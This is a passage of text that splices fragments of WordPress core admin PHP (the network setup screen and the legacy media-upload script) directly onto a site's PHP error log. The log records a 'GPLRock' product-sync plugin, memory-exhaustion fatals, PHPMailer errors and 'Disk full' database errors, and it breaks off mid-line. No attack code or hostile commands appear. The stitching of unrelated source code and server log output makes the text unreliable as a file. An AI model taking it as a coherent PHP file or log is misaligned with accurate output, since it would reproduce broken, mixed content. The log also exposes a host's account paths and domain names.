'<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/multisite/create-network/">Documentation on Creating a Network</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-network-screen/">Documentation on the Network Screen</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <?php if ( $_POST ) { check_admin_referer( 'install-network-1' ); require_once ABSPATH . 'wp-admin/includes/upgrade.php'; // Create network tables. install_network(); $base = parse_url( trailingslashit( get_option( 'home' ) ), PHP_URL_PATH ); $subdomain_install = allow_subdomain_install() ? ! empty( $_POST['subdomain_install'] ) : false; if ( ! network_domain_check() ) { $result = populate_network( 1, get_clean_basedomain(), sanitize_email( $_POST['email'] ), wp_unslash( $_POST['sitename'] ), $base, $subdomain_install ); if ( is_wp_error( $result ) ) { if ( 1 === count( $result->get_error_codes() ) && 'no_wildcard_dns' === $result->get_error_code() ) { network_step2( $result ); } else { network_step1( $result ); } } else { network_step2(); } } else { network_step2(); } } elseif ( is_multisite() || network_domain_check() ) { network_step2(); } else { network_step1(); } ?> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> <?php /** * Manage media uploaded file. * * There are many filters in here for media. Plugins can extend functionality * by hooking into the filters. * * @package WordPress * @subpackage Administration */ if ( ! isset( $_GET['inline'] ) ) { define( 'IFRAME_REQUEST', true ); } /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'upload_files' ) ) { wp_die( __( 'Sorry, you are not allowed to upload files.' ), 403 ); } wp_enqueue_script( 'plupload-handlers' ); wp_enqueue_script( 'image-edit' ); wp_enqueue_script( 'set-post-thumbnail' ); wp_enqueue_style( 'imgareaselect' ); wp_enqueue_script( 'media-gallery' ); header( 'Content-Type: ' . get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' ) ); // IDs should be integers. $ID = isset( $ID ) ? (int) $ID : 0; // phpcs:ignore WordPress.NamingConventions.ValidVariableName $post_id = isset( $post_id ) ? (int) $post_id : 0; // Require an ID for the edit screen. if ( isset( $action ) && 'edit' === $action && ! $ID ) { // phpcs:ignore WordPress.NamingConventions.ValidVariableName wp_die( '<h1>' . __( 'An error occurred during the upload process.' ) . '</h1>' . '<p>' . __( 'Invalid item ID. You can view all media items in the <a href="upload.php">Media Library</a>.' ) . '</p>', 403 ); } if ( ! empty( $_REQUEST['post_id'] ) && ! current_user_can( 'edit_post', $_REQUEST['post_id'] ) ) { wp_die( '<h1>' . __( 'You need a higher level of permission.' ) . '</h1>' . '<p>' . __( 'Sorry, you are not allowed to edit this item.' ) . '</p>', 403 ); } // Upload type: image, video, file, ...? if ( isset( $_GET['type'] ) ) { $type = (string) $_GET['type']; } else { /** * Filters the default media upload type in the legacy (pre-3.5.0) media popup. * * @since 2.5.0 * * @param string $type The default media upload type. Possible values include * 'image', 'audio', 'video', 'file', etc. Default 'file'. */ $type = apply_filters( 'media_upload_default_type', 'file' ); } // Tab: gallery, library, or type-specific. if ( isset( $_GET['tab'] ) ) { $tab = (string) $_GET['tab']; } else { /** * Filters the default tab in the legacy (pre-3.5.0) media popup. * * @since 2.5.0 * * @param string $tab The default media popup tab. Default 'type' (From Computer). */ $tab = apply_filters( 'media_upload_default_tab', 'type' ); } $body_id = 'media-upload'; // Let the action code decide how to handle the request. if ( 'type' === $tab || 'type_url' === $tab || ! array_key_exists( $tab, media_upload_tabs() ) ) { /** * Fires inside specific upload-type views in the legacy (pre-3.5.0) * media popup based on the current tab. * * The dynamic portion of the hook name, `$type`, refers to the specific * media upload type. * * The hook only fires if the current `$tab` is 'type' (From Computer), * 'type_url' (From URL), or, if the tab does not exist (i.e., has not * been registered via the {@see 'media_upload_tabs'} filter. * * Possible hook names include: * * - `media_upload_audio` * - `media_upload_file` * - `media_upload_image` * - `media_upload_video` * * @since 2.5.0 */ do_action( "media_upload_{$type}" ); } else { /** * Fires inside limited and specific upload-tab views in the legacy * (pre-3.5.0) media popup. * * The dynamic portion of the hook name, `$tab`, refers to the specific * media upload tab. Possible values include 'library' (Media Library), * or any custom tab registered via the {@see 'media_upload_tabs'} filter. * * @since 2.5.0 */ do_action( "media_upload_{$tab}" ); } [08-Mar-2026 17:53:54 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [08-Mar-2026 17:53:54 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [08-Mar-2026 17:53:59 UTC] GPLRock API Sync: Batch başlıyor - Offset: 200, Total: 200/9737 [08-Mar-2026 17:54:00 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:01 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:54:20 UTC] GPLRock API Sync: Batch başlıyor - Offset: 500, Total: 500/9737 [08-Mar-2026 17:54:20 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:21 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:54:42 UTC] GPLRock API Sync: Batch başlıyor - Offset: 600, Total: 600/9737 [08-Mar-2026 17:54:43 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:43 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:08 UTC] GPLRock API Sync: Batch başlıyor - Offset: 300, Total: 0/9737 [08-Mar-2026 17:55:09 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:09 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:11 UTC] GPLRock API Sync: Batch başlıyor - Offset: 400, Total: 0/9737 [08-Mar-2026 17:55:12 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:12 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:32 UTC] GPLRock API Sync: Batch başlıyor - Offset: 600, Total: 0/9737 [08-Mar-2026 17:55:33 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:34 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:38 UTC] GPLRock API Sync: Batch başlıyor - Offset: 700, Total: 0/9737 [08-Mar-2026 17:55:39 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:39 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:56:39 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1000, Total: 300/9737 [08-Mar-2026 17:56:39 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:56:40 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:57:43 UTC] GPLRock API Sync: Batch başlıyor - Offset: 700, Total: 0/9737 [08-Mar-2026 17:57:44 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:57:44 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:57:58 UTC] GPLRock API Sync: Batch başlıyor - Offset: 800, Total: 0/9737 [08-Mar-2026 17:57:59 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:57:59 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:46 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1000, Total: 0/9737 [08-Mar-2026 17:59:48 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:48 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:59:49 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1100, Total: 0/9737 [08-Mar-2026 17:59:50 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:59:50 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 23:53:10 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3500, Total: 1200/9737 [08-Mar-2026 23:53:11 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 23:53:12 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 00:06:15 UTC] GPLRock API Sync: Batch başlıyor - Offset: 3900, Total: 1600/9737 [09-Mar-2026 00:06:15 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 00:06:18 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 07:43:08 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/litespeed-cache/thirdparty/woocommerce.cls.php on line 947 [09-Mar-2026 11:31:07 UTC] GPLRock API Sync: Batch başlıyor - Offset: 5400, Total: 3100/9737 [09-Mar-2026 11:31:08 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 11:31:08 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:12:37 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6300, Total: 4000/9737 [09-Mar-2026 16:12:38 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:12:39 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:29:01 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6600, Total: 4300/9737 [09-Mar-2026 16:29:02 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:29:03 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:30:04 UTC] GPLRock API Sync: Batch başlıyor - Offset: 6900, Total: 4600/9737 [09-Mar-2026 16:30:05 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:30:05 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 16:32:02 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7200, Total: 4900/9737 [09-Mar-2026 16:32:03 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 16:32:03 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:19:23 UTC] GPLRock API Sync: Batch başlıyor - Offset: 7900, Total: 5400/9737 [09-Mar-2026 17:19:24 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:19:24 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:20:28 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8100, Total: 5600/9737 [09-Mar-2026 17:20:29 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:20:30 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:21:28 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8400, Total: 5900/9737 [09-Mar-2026 17:21:29 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:21:29 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:23:29 UTC] GPLRock API Sync: Batch başlıyor - Offset: 8700, Total: 6200/9737 [09-Mar-2026 17:23:30 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:23:30 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:25:30 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9000, Total: 6500/9737 [09-Mar-2026 17:25:31 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:25:31 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:27:31 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9300, Total: 6800/9737 [09-Mar-2026 17:27:32 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:27:33 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 17:29:32 UTC] GPLRock API Sync: Batch başlıyor - Offset: 9600, Total: 7100/9737 [09-Mar-2026 17:29:33 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [09-Mar-2026 17:29:37 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [09-Mar-2026 19:09:03 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/litespeed-cache/thirdparty/woocommerce.cls.php on line 593 [20-Mar-2026 19:03:25 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/litespeed-cache/thirdparty/woocommerce.cls.php on line 526 [02-Apr-2026 10:45:07 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 5242880 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/includes/classes/class.mycred-open-badge.php on line 69 [02-Apr-2026 11:54:02 UTC] PHP Fatal error: Uncaught Error: Call to undefined function PHPMailer\PHPMailer\mail() in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php:892 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(2083): PHPMailer\PHPMailer\PHPMailer->mailPassthru() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1800): PHPMailer\PHPMailer\PHPMailer->mailSend() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1615): PHPMailer\PHPMailer\PHPMailer->postSend() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/pluggable.php(625): PHPMailer\PHPMailer\PHPMailer->send() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/user.php(2815): wp_mail() #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/user.php(233): wp_update_user() #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/user-edit.php(171): edit_user() #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php on line 892 [02-Apr-2026 11:54:07 UTC] PHP Fatal error: Uncaught Error: Call to undefined function PHPMailer\PHPMailer\mail() in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php:892 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(2083): PHPMailer\PHPMailer\PHPMailer->mailPassthru() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1800): PHPMailer\PHPMailer\PHPMailer->mailSend() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1615): PHPMailer\PHPMailer\PHPMailer->postSend() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/pluggable.php(625): PHPMailer\PHPMailer\PHPMailer->send() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/user.php(2815): wp_mail() #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/user.php(233): wp_update_user() #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/user-edit.php(171): edit_user() #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php on line 892 [02-Apr-2026 11:56:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined function PHPMailer\PHPMailer\mail() in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php:892 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(2083): PHPMailer\PHPMailer\PHPMailer->mailPassthru() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1800): PHPMailer\PHPMailer\PHPMailer->mailSend() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1615): PHPMailer\PHPMailer\PHPMailer->postSend() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/pluggable.php(625): PHPMailer\PHPMailer\PHPMailer->send() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/user.php(2815): wp_mail() #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/user.php(233): wp_update_user() #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/user-edit.php(171): edit_user() #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php on line 892 [02-Apr-2026 14:25:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 2621440 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/litespeed-cache/src/core.cls.php on line 338 [02-Apr-2026 16:16:37 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d7eb4-145f4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:16:37 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d7eb4-145f7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 16:18:38 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d8a6c-1d5e6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:18:39 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d8a6c-1d5e9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 16:20:39 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d9882-ba24.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:20:39 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6d9882-ba27.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 16:22:41 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6da81a-45b9.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 16:22:41 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-6da81a-45bc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:11:05 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707107-bdb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:11:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707107-bde.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:11:06 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70711b-17a6d.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:11:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-70711b-17a70.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:11:07 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707131-b65.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:11:08 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707131-b68.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:11:41 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707441-1c796.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:11:42 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707441-1c799.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:12:48 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707b26-af8.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:12:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707b26-afb.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_usermeta` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('init'), WP_Hook->do_action, WP_Hook->apply_filters, myCred_Badge_Editor_Core->init_badge_editor, require_once('/plugins/mycred/addons/badge-editor/includes/class-mycred-badge-editor.php'), myCred_Badge_Editor::get_instance, myCred_Badge_Editor->__construct, set_user_setting, wp_set_all_user_settings, update_user_option, update_user_meta, update_metadata [02-Apr-2026 18:12:49 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707b26-afd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_postmeta` made by do_action('wp_ajax_heartbeat'), WP_Hook->do_action, WP_Hook->apply_filters, wp_ajax_heartbeat, apply_filters('heartbeat_received'), WP_Hook->apply_filters, wp_refresh_post_lock, wp_set_post_lock, update_post_meta, update_metadata [02-Apr-2026 18:13:03 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-707ce9-7750.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [02-Apr-2026 18:13:03 UTC] WordPress database error Disk 